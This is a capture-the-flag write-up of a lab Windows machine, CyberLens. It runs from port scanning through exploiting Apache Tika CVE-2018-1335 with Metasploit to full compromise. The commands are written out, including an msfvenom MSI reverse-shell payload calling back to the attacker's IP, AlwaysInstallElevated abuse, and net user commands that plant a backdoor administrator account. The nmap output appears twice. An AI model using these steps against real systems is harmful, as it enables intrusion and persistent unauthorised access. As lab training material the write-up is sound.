CyberLens

c84aa6449ddeda25d7738f6e0a3912cc.png

Target IP: 10.10.253.84
Challenge Description:

bf4578e06ca6744675c3109125d32e64.png


Reconnaissance

caf296c6feaec8cec224dc634f225537.png
Performing a port scan using the command sudo nmap -sS 10.10.253.84 -p- returns the result shown above. By the looks of it, the target machine is running the Windows operating system as some services hint it is a Windows machine. Time to perform an aggressive scan against these open TCP ports to identify its services.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -A 10.10.253.84 -p 80,135,139,445,3389,5985,7680,47001-61777 
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-26 19:48 UTC
Nmap scan report for 10.10.253.84
Host is up (0.024s latency).
Not shown: 14767 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Apache httpd 2.4.57 ((Win64))
|_http-server-header: Apache/2.4.57 (Win64)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: CyberLens: Unveiling the Hidden Matrix
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-05-26T19:50:20+00:00; +3s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: CYBERLENS
|   NetBIOS_Domain_Name: CYBERLENS
|   NetBIOS_Computer_Name: CYBERLENS
|   DNS_Domain_Name: CyberLens
|   DNS_Computer_Name: CyberLens
|   Product_Version: 10.0.17763
|_  System_Time: 2024-05-26T19:50:12+00:00
| ssl-cert: Subject: commonName=CyberLens
| Not valid before: 2024-05-25T19:44:34
|_Not valid after:  2024-11-24T19:44:34
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7680/tcp  open  pando-pub?
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
61777/tcp open  http          Jetty 8.y.z-SNAPSHOT
| http-methods: 
|_  Potentially risky methods: PUT
|_http-cors: HEAD GET
|_http-title: Site doesn't have a title (text/plain).
|_http-server-header: Jetty(8.y.z-SNAPSHOT)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94%E=4%D=5/26%OT=80%CT=47002%CU=36221%PV=Y%DS=2%DC=T%G=Y%TM=665
OS:39279%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S
OS:%TS=U)SEQ(SP=105%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M509NW8NN
OS:S%O2=M509NW8NNS%O3=M509NW8%O4=M509NW8NNS%O5=M509NW8NNS%O6=M509NNS)WIN(W1
OS:=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O
OS:=M509NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T
OS:=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=
OS:0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=
OS:Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=
OS:Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%R
OS:IPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2s, deviation: 0s, median: 2s
| smb2-time: 
|   date: 2024-05-26T19:50:16
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

TRACEROUTE (using port 56555/tcp)
HOP RTT      ADDRESS
1   23.39 ms 10.14.0.1
2   24.07 ms 10.10.253.84

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.90 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -A 10.10.253.84 -p 80,135,139,445,3389,5985,7680,47001-61777 
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-26 19:48 UTC
Nmap scan report for 10.10.253.84
Host is up (0.024s latency).
Not shown: 14767 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Apache httpd 2.4.57 ((Win64))
|_http-server-header: Apache/2.4.57 (Win64)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: CyberLens: Unveiling the Hidden Matrix
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-05-26T19:50:20+00:00; +3s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: CYBERLENS
|   NetBIOS_Domain_Name: CYBERLENS
|   NetBIOS_Computer_Name: CYBERLENS
|   DNS_Domain_Name: CyberLens
|   DNS_Computer_Name: CyberLens
|   Product_Version: 10.0.17763
|_  System_Time: 2024-05-26T19:50:12+00:00
| ssl-cert: Subject: commonName=CyberLens
| Not valid before: 2024-05-25T19:44:34
|_Not valid after:  2024-11-24T19:44:34
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7680/tcp  open  pando-pub?
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
61777/tcp open  http          Jetty 8.y.z-SNAPSHOT
| http-methods: 
|_  Potentially risky methods: PUT
|_http-cors: HEAD GET
|_http-title: Site doesn't have a title (text/plain).
|_http-server-header: Jetty(8.y.z-SNAPSHOT)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94%E=4%D=5/26%OT=80%CT=47002%CU=36221%PV=Y%DS=2%DC=T%G=Y%TM=665
OS:39279%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S
OS:%TS=U)SEQ(SP=105%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M509NW8NN
OS:S%O2=M509NW8NNS%O3=M509NW8%O4=M509NW8NNS%O5=M509NW8NNS%O6=M509NNS)WIN(W1
OS:=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O
OS:=M509NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T
OS:=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=
OS:0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=
OS:Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=
OS:Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%R
OS:IPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2s, deviation: 0s, median: 2s
| smb2-time: 
|   date: 2024-05-26T19:50:16
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

TRACEROUTE (using port 56555/tcp)
HOP RTT      ADDRESS
1   23.39 ms 10.14.0.1
2   24.07 ms 10.10.253.84

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.90 seconds

I ran the command sudo nmap -sV -A 10.10.253.84 -p 80,135,139,445,3389,5985,7680,47001-61777 to perform an aggressive port scan against the open TCP ports and received the result shown above. This scan retrieved a lot of information such as the applications running on the different ports. I notice the SMB is open, there are multiple web applications including on port 80 and 61777, etc. Time to identify the operating system name and version now.

┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 10.10.253.84                       
SMB         10.10.253.84    445    CYBERLENS        [*] Windows 10.0 Build 17763 x64 (name:CYBERLENS) (domain:CyberLens) (signing:False) (SMBv1:False)
┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 10.10.253.84                       
SMB         10.10.253.84    445    CYBERLENS        [*] Windows 10.0 Build 17763 x64 (name:CYBERLENS) (domain:CyberLens) (signing:False) (SMBv1:False)

Running crackmap with the command crackmapexec smb 10.10.253.84 returns the target machine is running Windows Windows 10.0 Build 17763 x64, as shown above. I performed further analysis but I did not find anything useful. Time to perform enumeration now.


Enumeration

Port 61777: HTTP
60a90e2e079763d7b0abeab4822f5bab.png
On this port, I notice the application Apache Tika 1.17 Server is running. Does this application have any vulnerabilities? Time to find out.

03d7285bb7b49e53c4feb4616de05f54.png
I searched for Apache Tika 1.17 Server exploit on Google and found the website above. It seems like the application is vulnerable to command injection, as shown above. This vulnerability has the CVE id of CVE-2018-1335. Since the target machine is running Windows and the application version is within the range Apache Tika 1.15 - 1.17 on Windows, I think I found a vulnerability. Since this article is created by Rapid7, the framework Metasploit will contain a working exploit for this vulnerabiliity. I found this amazing website which goes into more depth about the vulnerability here. Time to test the exploit.


Exploitation

493acfe00d73a06e208f645e80c5c7e4.png
I ran the command msfconsole -q to fire-up the Metasploit framework, as shown above. Then I searched for the string apache tika 1.17 to find available modules and found one. This exploit is located at exploit/windows/http/apache_tika_jp2_jscript, so I used the command use 0 to use this module, as shown above.

e491d7086b1083a4e8385a3ea5e14d9c.png
I checked the parameters of this exploit using the command show options. The parameters are basic I noticed. I initialised three parameters: RHOSTS, RPORT, and LHOST as shown above. I used the commands set RHOSTS 10.10.253.84 to set the target, set RPORT 61777 to set the port of the application on the target machine, and set LHOST tun0 to catch the meterpreter reverse shell connection on my machine at its default port. After initialising the parameters, I used the option check and identified the target machine is vulnerable to this exploit. Time to exploit it.

048051dde5b80ef31890315a21f9f58a.png
I ran the command run to launch the exploit. After launching the exploit, I obtained a meterpreter reverse shell connection. Then I used the command shell to open a new shell on the target machine. Now I have a foothold on the target machine as the user cyberlens, as shown above.


Privilege Escalation

5b02ffa011024e5ed25f30cfc12a5874.png
After landing a shell on the target machine, I tried to find possible users on the target machine. I noticed there is a user called CyberLens. When checking the directories of this user, I notice an unusual directory with the name Management inside the Documents folder, as shown above. This Management folder has a text file with the name CyberLens-Management.txt which seems to contain the credentials CyberLens:HackSmarter123, as shown above. From previous enumeration, the RDP on port 3389 was open. Maybe I can RDP into the target machine using the new credentials?

ec8e38108ef3d0e6bf0e4c373b61b661.png
And bingo! Now I have an RDP session on the target machine. To achieve this I used the tool xfreerdp with the command xfreerdp /u:CyberLens /p:'HackSmarter123' /v:10.10.253.84, as shown above.

e95f0b1dc19aad00435ef01a001c017a.png
I served winPEAS.bat to the target machine. And after running it on the target machine, I noticed the target machine has AlwaysInstallElevated privileges enabled. This local privilege escalation vector enables all users on the machine to automatically run any Microsoft Installer (MSI) with higher privileges, such as the administrator. To gain administrator privileges on the target machine, I can create a malicious MSI file to give me higher privileges :)

43e4e433ec963290a82022af385a6812.png
And bingo now I have a NT authority/system shell on the target machine as shown above. To achieve this, I used the command msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.14.55.153 LPORT=8443 -a x64 --platform Windows -f msi -o evil.msi to generate a malicious MSI file. This will invoke a reverse shell connection to my machine at port 8443 with elevated privileges. Then I started a listener on my machine at port 8443. Over at the target machine, I executed the evil.msi which was served by my Python HTTP server. At the moment, I only have a shell access. Time to add my own user with administrator privileges.

1297e44835490fc86c55963f628926ea.png
To add my new admin user on the target machine, I created a new user called admin and the password as Password123 using the command net user /add admin Password123. Then I added this user to the Administrators group using the command net localgroup administrators admin /add, as shown above. Time to RDP into the target machine as this new administrator user.

2fb9b09a3511a23573b12753515e93ae.png
And bingo! I was able to successfully RDP into the target machine as the new user admin using the command xfreerdp /u:admin /p:'Password123' /v:10.10.253.84 as shown above. This user belongs to the administrator group too. Now I have administrator privileges with RDP access on the target machine. GG :)


Flags

94dc166d07f50dde35b53e6fa9755892.png
The user flag is shown above.

fefaff56c3e1f8b0c4494a2c57889193.png
The admin flag is shown above.